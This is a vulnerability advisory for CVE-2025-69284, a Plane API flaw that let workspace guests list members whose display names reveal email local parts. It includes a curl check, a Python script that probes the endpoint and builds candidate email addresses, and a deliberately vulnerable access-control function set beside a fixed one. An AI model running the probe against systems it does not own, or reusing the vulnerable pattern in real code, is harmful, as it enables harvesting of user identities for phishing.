CVE-2025-69284
Information Disclosure via Unauthorized Workspace Member Listing in Plane.io Prior to

Publication date: 2026-01-02

Last updated on: 2026-02-25

Assigner: GitHub, Inc.

Description
Plane is an open-source project management tool. In plane.io, a guest user does not have permission to access https[:]//app[.]plane[.]so/[:]slug/settings. Prior to Plane version 1.2.0, however, the `/api/workspaces/:slug/members/` endpoint was reachable by guests, who could list the users of any workspace they had joined. Since the `display_name` in the response is the local part of the user's email address (the text before '@'), a malicious guest can still identify admin users' email addresses. Version 1.2.0 fixes this issue.
Meta Information
Published: 2026-01-02
Last Modified: 2026-02-25
Generated: 2026-06-16
AI Q&A: 2026-01-02
EPSS Evaluated: 2026-06-15
Affected Vendors & Products (1 associated CPE)
Vendor: plane
Product: plane
Version / Range: 1.1.0
CWE
CWE-284 (Improper Access Control): The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
AI Quick Actions
Executive Summary

CVE-2025-69284 is a vulnerability in plane.io versions prior to 1.2.0 where a guest user can call the API endpoint `/api/workspaces/:slug/members/` and retrieve the full member list of a workspace they have joined. Although guests cannot open the workspace settings page, the API response includes a `display_name` field that is derived from the local part of each user's email address (the text before '@'), so a malicious guest who knows or guesses the organisation's mail domain can reconstruct admin and other users' email addresses. The root cause is missing authorization on the endpoint (improper access control, CWE-284). [1]

Impact Analysis

This vulnerability exposes the email local parts of all workspace members, including admins, to any authenticated guest of that workspace; beyond holding a guest account, no elevated privilege or user interaction is required. This compromises the confidentiality of user identities and gives an attacker a ready-made target list for phishing or social engineering, with admin accounts being the most valuable targets. [1]

Detection Guidance

You can check whether an instance is affected by requesting `/api/workspaces/:slug/members/` while authenticated as a guest member of the workspace. Log in as a guest, take the session credential your deployment issues to the browser (for example the session cookie), and send the request with it; an unauthenticated request only tests whether anonymous access is blocked, which is not the issue here. With curl: `curl -i -X GET 'https://<your-plane-host>/api/workspaces/<slug>/members/' -H 'Cookie: <guest session cookie>'`, replacing `<your-plane-host>` with your instance (the hosted service is `app.plane.so`) and `<slug>` with the workspace identifier. If the response is HTTP 200 with a JSON list of members whose `display_name` fields are populated, the instance is vulnerable; an authorization error (HTTP 401 or 403) indicates the guest is being refused as intended. [1]
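The check described above, as an added example that is not part of this advisory or of the Plane project: it classifies the response a guest account gets from the members endpoint and turns any exposed `display_name` values into candidate addresses for a mail domain the tester already knows. The response shapes it accepts (a JSON list, or a dict paging items under `results`, with `display_name` at the top level or nested under `member`), the 401/403 behaviour of a patched instance, and the `Cookie` header used for the live request are assumptions for this illustration, not taken from Plane's documentation; the sample body is constructed.

```python
"""Added example (not Plane's code): classify a guest's /api/workspaces/<slug>/members/
response and derive candidate email addresses from exposed display names."""
from __future__ import annotations

import json
import urllib.error
import urllib.request
from typing import Iterable


def extract_handles(body: str) -> list[str]:
    """Collect display_name values from a members listing.

    Assumed shapes: a JSON list of member objects, or a dict paging them under
    "results"; display_name at the top level of each item or nested under "member".
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if isinstance(data, list):
        items = data
    elif isinstance(data, dict):
        items = data.get("results", [])
    else:
        items = []
    handles: list[str] = []
    for item in items:
        if not isinstance(item, dict):
            continue
        name = item.get("display_name")
        if name is None and isinstance(item.get("member"), dict):
            name = item["member"].get("display_name")
        if isinstance(name, str) and name:
            handles.append(name)
    return handles


def classify(status: int, body: str) -> str:
    """'vulnerable' if the guest got member data, 'fixed' on an auth refusal, else 'inconclusive'."""
    if status in (401, 403):
        return "fixed"
    if status == 200 and extract_handles(body):
        return "vulnerable"
    return "inconclusive"


def candidate_addresses(handles: Iterable[str], domain: str) -> list[str]:
    """display_name is the local part of the email, so joining it with the
    organisation's domain (which the guest must know or guess) gives candidates."""
    return sorted({f"{handle}@{domain}" for handle in handles})


def check_live(base_url: str, slug: str, session_cookie: str) -> str:
    """Run the guest request against a real instance (needs network access and a
    valid guest session; the cookie value is whatever your deployment issues)."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/api/workspaces/{slug}/members/",
        headers={"Cookie": session_cookie, "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return classify(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode())


# Constructed sample body, not captured from a real instance.
SAMPLE_VULNERABLE_BODY = json.dumps([
    {"member": {"id": "a1", "display_name": "alice.admin"}},
    {"member": {"id": "b2", "display_name": "bob"}},
    {"id": "c3", "display_name": "carol"},
])

if __name__ == "__main__":
    verdict = classify(200, SAMPLE_VULNERABLE_BODY)
    print(verdict, candidate_addresses(extract_handles(SAMPLE_VULNERABLE_BODY), "example.com"))
```

`check_live` is the only function that touches the network; everything else runs offline on the constructed body, which is what makes the classifier easy to adapt if your instance returns a different JSON layout.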

Mitigation Strategies

The immediate mitigation is to upgrade your Plane installation to version 1.2.0 or later, where the endpoint's access control was fixed. If you cannot upgrade right away, keep in mind that a reverse proxy cannot tell a guest session from an admin session by URL alone, so blocking the `/api/workspaces/:slug/members/` path at the proxy removes the member listing for every role; the alternative interim measure is to remove or suspend guest accounts (and stop issuing guest invites) until the upgrade is done. [1]
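The access-control mistake behind this CVE, shown as an added example that is not Plane's code: a minimal in-memory model in which `list_members_vulnerable` only checks that the requester belongs to the workspace, so a guest can enumerate everyone, while `list_members_hardened` also requires a role that is allowed to see the member list. The role names, the rule that guests may not list members, and the sample workspace are assumptions for this illustration, not Plane's actual policy or data.

```python
"""Added example (not Plane's code): membership-only vs membership-plus-role checks
on a workspace member listing, the CWE-284 pattern behind CVE-2025-69284."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Member:
    user_id: str
    email: str
    role: str  # "admin", "member" or "guest" (assumed role set)

    @property
    def display_name(self) -> str:
        # Mirrors the advisory: the display name is the local part of the email.
        return self.email.split("@", 1)[0]


class Forbidden(Exception):
    """Raised when the requester may not see the listing."""


LISTING_ROLES = {"admin", "member"}  # assumption: roles allowed to enumerate members


def _membership(workspace: dict[str, Member], requester_id: str) -> Member:
    """Both variants share this step: outsiders are refused."""
    try:
        return workspace[requester_id]
    except KeyError:
        raise Forbidden("not a member of this workspace") from None


def list_members_vulnerable(workspace: dict[str, Member], requester_id: str) -> list[dict]:
    """Checks membership only, so a guest receives every display_name (the bug class)."""
    _membership(workspace, requester_id)
    return [{"id": m.user_id, "display_name": m.display_name} for m in workspace.values()]


def list_members_hardened(workspace: dict[str, Member], requester_id: str) -> list[dict]:
    """Membership plus a role check; guests are refused outright."""
    me = _membership(workspace, requester_id)
    if me.role not in LISTING_ROLES:
        raise Forbidden(f"role '{me.role}' may not list workspace members")
    return [{"id": m.user_id, "display_name": m.display_name} for m in workspace.values()]


def is_refused(listing: Callable[[dict[str, Member], str], list[dict]],
               workspace: dict[str, Member], requester_id: str) -> bool:
    """True if the listing function rejects this requester."""
    try:
        listing(workspace, requester_id)
    except Forbidden:
        return True
    return False


# Constructed sample workspace (not real data).
WORKSPACE = {m.user_id: m for m in (
    Member("u1", "alice.admin@example.com", "admin"),
    Member("u2", "bob@example.com", "member"),
    Member("u3", "eve.guest@contractor.example", "guest"),
)}

if __name__ == "__main__":
    print("vulnerable, guest sees:", list_members_vulnerable(WORKSPACE, "u3"))
    print("hardened, guest refused:", is_refused(list_members_hardened, WORKSPACE, "u3"))
```

The point of the two functions sitting side by side is that the fix is one extra predicate on the requester's role, evaluated before any member data is serialised; the vulnerable variant already authenticates the caller and confirms membership, which is why the bug is an authorization (CWE-284) issue rather than an authentication one.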

Compliance Impact

This vulnerability exposes user identity information by allowing guest users to infer email addresses of admins and other workspace members without proper authorization. Such unauthorized disclosure of personal data could lead to non-compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and disclosure. [1]
